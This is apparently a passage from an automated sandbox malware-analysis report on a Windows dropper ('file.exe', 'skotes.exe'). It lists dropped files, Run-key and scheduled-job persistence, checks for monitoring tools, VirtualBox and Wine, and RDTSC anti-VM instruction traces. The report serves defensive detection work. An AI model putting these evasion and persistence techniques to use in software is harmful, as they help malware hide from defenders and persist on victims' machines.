Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d7c50276ff.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7d61336cf8.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run aae25c676b.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Window searched: window name: Regmonclass
Creates job files (autostart)
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run aae25c676b.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run aae25c676b.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7d61336cf8.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7d61336cf8.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d7c50276ff.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d7c50276ff.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F7F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 12_2_00F7F98E
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FF1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 12_2_00FF1C41
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found API chain indicative of sandbox detection
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation Jump to behavior
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D4537 second address: 9D454E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F08C0CB452Fh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D454E second address: 9D3E5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F08C0C91958h 0x0000000f pop edx 0x00000010 nop 0x00000011 or dword ptr [ebp+122D2009h], ecx 0x00000017 push dword ptr [ebp+122D126Dh] 0x0000001d jmp 00007F08C0C9195Bh 0x00000022 call dword ptr [ebp+122D1FFEh] 0x00000028 pushad 0x00000029 jne 00007F08C0C91957h 0x0000002f xor eax, eax 0x00000031 jnl 00007F08C0C91957h 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b jno 00007F08C0C9195Ch 0x00000041 jmp 00007F08C0C91969h 0x00000046 mov dword ptr [ebp+122D2EB9h], eax 0x0000004c pushad 0x0000004d sub dword ptr [ebp+122D33CBh], esi 0x00000053 add esi, dword ptr [ebp+122D2DB1h] 0x00000059 popad 0x0000005a mov esi, 0000003Ch 0x0000005f pushad 0x00000060 xor di, F3D0h 0x00000065 xor dword ptr [ebp+122D1C3Dh], edx 0x0000006b popad 0x0000006c add esi, dword ptr [esp+24h] 0x00000070 sub dword ptr [ebp+122D1C52h], edx 0x00000076 lodsw 0x00000078 jmp 00007F08C0C91965h 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 jnp 00007F08C0C91957h 0x00000087 mov ebx, dword ptr [esp+24h] 0x0000008b jmp 00007F08C0C9195Fh 0x00000090 nop 0x00000091 pushad 0x00000092 push eax 0x00000093 jno 00007F08C0C91956h 0x00000099 pop eax 0x0000009a push eax 0x0000009b push edx 0x0000009c jbe 00007F08C0C91956h 0x000000a2 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3E5D second address: 9D3E71 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F08C0CB4526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B3FE second address: B3B404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B404 second address: B3B411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B411 second address: B3B415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B415 second address: B3B419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B419 second address: B3B430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F08C0C9195Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B832 second address: B3B85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08C0CB4538h 0x00000009 jmp 00007F08C0CB452Ch 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B85F second address: B3B863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B863 second address: B3B867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B867 second address: B3B895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F08C0C9195Ch 0x00000010 jno 00007F08C0C91956h 0x00000016 jmp 00007F08C0C9195Ah 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push edi 0x0000001f pop edi 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B895 second address: B3B89F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B89F second address: B3B8A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B8A5 second address: B3B8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B8A9 second address: B3B8AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E0E3 second address: B3E0E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E0E9 second address: B3E114 instructions: 0x00000000 rdtsc 0x00000002 je 00007F08C0C91956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F08C0C9196Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E114 second address: B3E11A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E11A second address: B3E134 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F08C0C91956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F08C0C91958h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E134 second address: B3E14A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jo 00007F08C0CB4534h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E14A second address: B3E14E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E14E second address: B3E15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E15D second address: B3E161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E161 second address: 9D3E5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 mov edi, dword ptr [ebp+122D2FC1h] 0x0000000e push dword ptr [ebp+122D126Dh] 0x00000014 sbb di, F88Ah 0x00000019 call dword ptr [ebp+122D1FFEh] 0x0000001f pushad 0x00000020 jne 00007F08C0CB4527h 0x00000026 xor eax, eax 0x00000028 jnl 00007F08C0CB4527h 0x0000002e mov edx, dword ptr [esp+28h] 0x00000032 jno 00007F08C0CB452Ch 0x00000038 jmp 00007F08C0CB4539h 0x0000003d mov dword ptr [ebp+122D2EB9h], eax 0x00000043 pushad 0x00000044 sub dword ptr [ebp+122D33CBh], esi 0x0000004a add esi, dword ptr [ebp+122D2DB1h] 0x00000050 popad 0x00000051 mov esi, 0000003Ch 0x00000056 pushad 0x00000057 xor di, F3D0h 0x0000005c xor dword ptr [ebp+122D1C3Dh], edx 0x00000062 popad 0x00000063 add esi, dword ptr [esp+24h] 0x00000067 sub dword ptr [ebp+122D1C52h], edx 0x0000006d lodsw 0x0000006f jmp 00007F08C0CB4535h 0x00000074 add eax, dword ptr [esp+24h] 0x00000078 jnp 00007F08C0CB4527h 